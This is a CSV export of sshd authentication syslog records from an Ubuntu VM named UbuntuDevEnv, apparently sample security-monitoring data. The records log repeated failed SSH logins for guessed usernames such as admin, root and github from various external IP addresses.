+10926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:30,UbuntuDevEnv,2019-06-26 00:13:30,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 60888:11: Bye Bye [preauth],69325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,60888,,
+10927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:30,UbuntuDevEnv,2019-06-26 00:13:30,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 114.112.81.180 port 60888 [preauth],69325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,114.112.81.1,60888,,
+10928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:36,UbuntuDevEnv,2019-06-26 00:13:35,auth,UbuntuDevEnv,info,Invalid user titan from 88.247.110.88 port 43839,69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,43839,,
+10929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:36,UbuntuDevEnv,2019-06-26 00:13:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:36,UbuntuDevEnv,2019-06-26 00:13:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:37,UbuntuDevEnv,2019-06-26 00:13:37,auth,UbuntuDevEnv,info,Failed password for invalid user titan from 88.247.110.88 port 43839 ssh2,69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,43839,,
+10932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:38,UbuntuDevEnv,2019-06-26 00:13:38,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 43839:11: Bye Bye [preauth],69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,43839,,
+10933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:13:38,UbuntuDevEnv,2019-06-26 00:13:38,auth,UbuntuDevEnv,info,Disconnected from invalid user titan 88.247.110.88 port 43839 [preauth],69353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,43839,,
+10934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:10,UbuntuDevEnv,2019-06-26 00:14:09,auth,UbuntuDevEnv,info,Invalid user admin from 104.248.121.67 port 55401,69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,104.248.121.6,55401,,
+10935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:10,UbuntuDevEnv,2019-06-26 00:14:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+10936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:10,UbuntuDevEnv,2019-06-26 00:14:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:12,UbuntuDevEnv,2019-06-26 00:14:11,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 104.248.121.67 port 55401 ssh2,69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,104.248.121.6,55401,,
+10938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:12,UbuntuDevEnv,2019-06-26 00:14:11,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 104.248.121.67 port 55401 [preauth],69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,104.248.121.6,55401,,
+10939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:12,UbuntuDevEnv,2019-06-26 00:14:11,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 55401:11: Bye Bye [preauth],69484,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,55401,,
+10940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:13,UbuntuDevEnv,2019-06-26 00:14:12,auth,UbuntuDevEnv,info,Invalid user taxi from 118.222.146.186 port 56308,69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,118.222.146.1,56308,,
+10941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:13,UbuntuDevEnv,2019-06-26 00:14:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:13,UbuntuDevEnv,2019-06-26 00:14:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:15,UbuntuDevEnv,2019-06-26 00:14:15,auth,UbuntuDevEnv,info,Failed password for invalid user taxi from 118.222.146.186 port 56308 ssh2,69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,118.222.146.1,56308,,
+10944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:15,UbuntuDevEnv,2019-06-26 00:14:15,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 56308:11: Bye Bye [preauth],69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,56308,,
+10945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:14:15,UbuntuDevEnv,2019-06-26 00:14:15,auth,UbuntuDevEnv,info,Disconnected from invalid user taxi 118.222.146.186 port 56308 [preauth],69490,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,118.222.146.1,56308,,
+10946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:35,UbuntuDevEnv,2019-06-25 23:51:35,auth,UbuntuDevEnv,info,Invalid user scorpion from 138.68.12.43 port 53078,64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scorpion,138.68.12.4,53078,,
+10947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:35,UbuntuDevEnv,2019-06-25 23:51:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:35,UbuntuDevEnv,2019-06-25 23:51:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:38,UbuntuDevEnv,2019-06-25 23:51:37,auth,UbuntuDevEnv,info,Failed password for invalid user scorpion from 138.68.12.43 port 53078 ssh2,64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scorpion,138.68.12.4,53078,,
+10950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:38,UbuntuDevEnv,2019-06-25 23:51:37,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 53078:11: Bye Bye [preauth],64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,53078,,
+10951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:38,UbuntuDevEnv,2019-06-25 23:51:37,auth,UbuntuDevEnv,info,Disconnected from invalid user scorpion 138.68.12.43 port 53078 [preauth],64480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,scorpion,138.68.12.4,53078,,
+10952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:40,UbuntuDevEnv,2019-06-25 23:51:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=82.213.223.45  user=root,64406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,82.213.223.4,,0,
+10953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:42,UbuntuDevEnv,2019-06-25 23:51:41,auth,UbuntuDevEnv,info,Failed password for root from 82.213.223.45 port 58070 ssh2,64406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,82.213.223.4,58070,,
+10954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:47,UbuntuDevEnv,2019-06-25 23:51:46,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 82.213.223.45 port 58070 [preauth],64406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,82.213.223.4,58070,,authenticating
+10955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:52,UbuntuDevEnv,2019-06-25 23:51:51,auth,UbuntuDevEnv,info,Invalid user shoping from 196.27.127.61 port 59137,64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoping,196.27.127.6,59137,,
+10956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:52,UbuntuDevEnv,2019-06-25 23:51:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:52,UbuntuDevEnv,2019-06-25 23:51:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:54,UbuntuDevEnv,2019-06-25 23:51:53,auth,UbuntuDevEnv,info,Failed password for invalid user shoping from 196.27.127.61 port 59137 ssh2,64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoping,196.27.127.6,59137,,
+10959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:54,UbuntuDevEnv,2019-06-25 23:51:54,auth,UbuntuDevEnv,info,Disconnected from invalid user shoping 196.27.127.61 port 59137 [preauth],64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shoping,196.27.127.6,59137,,
+10960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:54,UbuntuDevEnv,2019-06-25 23:51:54,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 59137:11: Bye Bye [preauth],64549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,59137,,
+10961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:16,UbuntuDevEnv,2019-06-25 23:52:15,auth,UbuntuDevEnv,info,Invalid user nero from 131.100.219.3 port 45766,64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,131.100.219.3,45766,,
+10962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:16,UbuntuDevEnv,2019-06-25 23:52:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:16,UbuntuDevEnv,2019-06-25 23:52:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:18,UbuntuDevEnv,2019-06-25 23:52:17,auth,UbuntuDevEnv,info,Failed password for invalid user nero from 131.100.219.3 port 45766 ssh2,64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,131.100.219.3,45766,,
+10965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:18,UbuntuDevEnv,2019-06-25 23:52:18,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 45766:11: Bye Bye [preauth],64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,45766,,
+10966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:18,UbuntuDevEnv,2019-06-25 23:52:18,auth,UbuntuDevEnv,info,Disconnected from invalid user nero 131.100.219.3 port 45766 [preauth],64628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,131.100.219.3,45766,,
+10967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:37,UbuntuDevEnv,2019-06-25 23:52:36,auth,UbuntuDevEnv,info,Invalid user admin from 114.112.81.180 port 58692,64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,114.112.81.1,58692,,
+10968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:37,UbuntuDevEnv,2019-06-25 23:52:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:37,UbuntuDevEnv,2019-06-25 23:52:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:38,UbuntuDevEnv,2019-06-25 23:52:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 114.112.81.180 port 58692 ssh2,64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,114.112.81.1,58692,,
+10971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:38,UbuntuDevEnv,2019-06-25 23:52:38,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 58692:11: Bye Bye [preauth],64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,58692,,
+10972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:38,UbuntuDevEnv,2019-06-25 23:52:38,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 114.112.81.180 port 58692 [preauth],64707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,114.112.81.1,58692,,
+10973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:42,UbuntuDevEnv,2019-06-25 23:52:41,auth,UbuntuDevEnv,info,Invalid user github from 88.247.110.88 port 18109,64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,github,88.247.110.8,18109,,
+10974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:42,UbuntuDevEnv,2019-06-25 23:52:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:42,UbuntuDevEnv,2019-06-25 23:52:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:43,UbuntuDevEnv,2019-06-25 23:52:43,auth,UbuntuDevEnv,info,Failed password for invalid user github from 88.247.110.88 port 18109 ssh2,64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,github,88.247.110.8,18109,,
+10977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:44,UbuntuDevEnv,2019-06-25 23:52:43,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 18109:11: Bye Bye [preauth],64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,18109,,
+10978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:52:44,UbuntuDevEnv,2019-06-25 23:52:43,auth,UbuntuDevEnv,info,Disconnected from invalid user github 88.247.110.88 port 18109 [preauth],64729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,github,88.247.110.8,18109,,
+10979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:43,UbuntuDevEnv,2019-06-25 23:53:43,auth,UbuntuDevEnv,info,Invalid user user from 196.27.127.61 port 39225,64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,196.27.127.6,39225,,
+10980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:43,UbuntuDevEnv,2019-06-25 23:53:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:43,UbuntuDevEnv,2019-06-25 23:53:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:45,UbuntuDevEnv,2019-06-25 23:53:45,auth,UbuntuDevEnv,info,Failed password for invalid user user from 196.27.127.61 port 39225 ssh2,64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,196.27.127.6,39225,,
+10983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:46,UbuntuDevEnv,2019-06-25 23:53:45,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 39225:11: Bye Bye [preauth],64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,39225,,
+10984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:46,UbuntuDevEnv,2019-06-25 23:53:45,auth,UbuntuDevEnv,info,Disconnected from invalid user user 196.27.127.61 port 39225 [preauth],64942,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,196.27.127.6,39225,,
+10985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:53:49,UbuntuDevEnv,2019-06-25 23:53:49,auth,UbuntuDevEnv,info,Invalid user abc from 138.68.12.43 port 41034,64956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,138.68.12.4,41034,,
